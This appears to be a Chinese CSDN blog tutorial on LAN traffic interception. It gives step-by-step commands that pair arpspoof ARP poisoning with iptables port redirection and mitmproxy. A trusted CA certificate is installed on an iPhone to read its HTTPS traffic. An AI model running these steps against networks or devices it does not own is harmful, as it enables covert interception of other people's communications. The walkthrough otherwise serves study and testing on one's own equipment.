python arpspoof_使用arpspoof实现ARP欺骗,配合mitmproxy进行局域网嗅探抓包

本文介绍了如何在Ubuntu 18.04上利用python的arpspoof进行ARP欺骗,并配合mitmproxy进行局域网内的HTTP和HTTPS流量抓包。步骤包括查看和配置网卡、安装mitmproxy和arpspoof、设置IP转发、安装CA证书到iOS设备以及启动arpspoof进行嗅探。
摘要由CSDN通过智能技术生成

把PC和iPhone链接到同一个路由器上

攻击者和受害者需要在同一局域网内

1.查看发起攻击者的网卡和IP地址:

$ifconfig

eno1: flags=4163 mtu 1500

inet 192.168.2.105 netmask 255.255.255.0 broadcast 192.168.2.255

inet6 fe80::a56b:455a:b152:634c prefixlen 64 scopeid 0x20

ether 3c:52:82:77:89:4a txqueuelen 1000 (Ethernet)

RX packets 6992389 bytes 10246991870 (10.2 GB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 797373 bytes 102866826 (102.8 MB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

device interrupt 16 memory 0xf0100000-f0120000

可以看到网卡是:eno1, IP:192.168.2.105

2.查看同一局域网中,被攻击的iPhone的IP:192.168.2.103

0x00 mitmproxy的安装

在 Ubuntu 18.04 上安装

1.首先安装 python3 和 pip3

sudo apt-get install python3 python3-pip

2.安装依赖库

sudo apt-get install openssl

sudo apt-get install libssl-dev

sudo apt-get install libc6-dev gcc

sudo apt-get install -y make build-essential zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm tk-dev

3.安装 mitmproxy

sudo pip3 install mitmproxy

执行mitmproxy命令,如果能看到如下窗口,就说明安装成功了:

mitmproxy

0x01 在安装mitmproxy CA证书

在mitmproxy安装完成之后,并成功运行之后,会在~/.mitmproxy目录下,生成几个证书文件:

mitmproxy-ca-cert.cer

mitmproxy-ca-cert.p12

mitmproxy-ca-cert.pem # iOS 和 Android 设备需要的

mitmproxy-ca.pem

mitmproxy-dhparam.pem

iOS抓包举例:

我们把mitmproxy-ca-cert.pem通过邮箱发送到iPhone上,然后打开邮箱点击证书文件:

image.png

然后进入 设置-通用-描述文件与设备, 就会看到证书文件了,这时候还是未安装状态:

image.png

点击证书文件,进行安装:

image.png

安装完成之后,还有很重要的一步:设置信任刚刚安装的证书。

具体路径是:设置-关于本机-证书信任设置。

image.png

新安装的证书,默认情况下是不被信任的,需要手动开启。

到此结束,mitmproxy 相关的配置已经结束了。

0x02 安装配置arpspoof

sudo apt-get install dsniff

0x03 启用IP转发和端口重定向

sudo sysctl -w net.ipv4.ip_forward=1

#sudo iptables -t nat -A PREROUTING -i 网卡 -p tcp --dport 80 -j REDIRECT --to-port 8080

#sudo iptables -t nat -A PREROUTING -i 网卡 -p tcp --dport 443 -j REDIRECT --to-port 8080

sudo iptables -t nat -A PREROUTING -i eno1 -p tcp --dport 80 -j REDIRECT --to-port 8080

sudo iptables -t nat -A PREROUTING -i eno1 -p tcp --dport 443 -j REDIRECT --to-port 8080

0x04 开启arp伪装

#sudo arpspoof -t 被攻击者IP 网关 -i 网卡

$ sudo arpspoof -t 192.168.2.103 192.168.2.1 -i eno1

# 说明MAC已经被伪装,被攻击者的数据会发到攻击者上

f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53

f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53

f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53

f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53

f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53

f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53

f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53

0x05开启mitmproxy进行抓包

sudo mitmproxy -T --host

image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值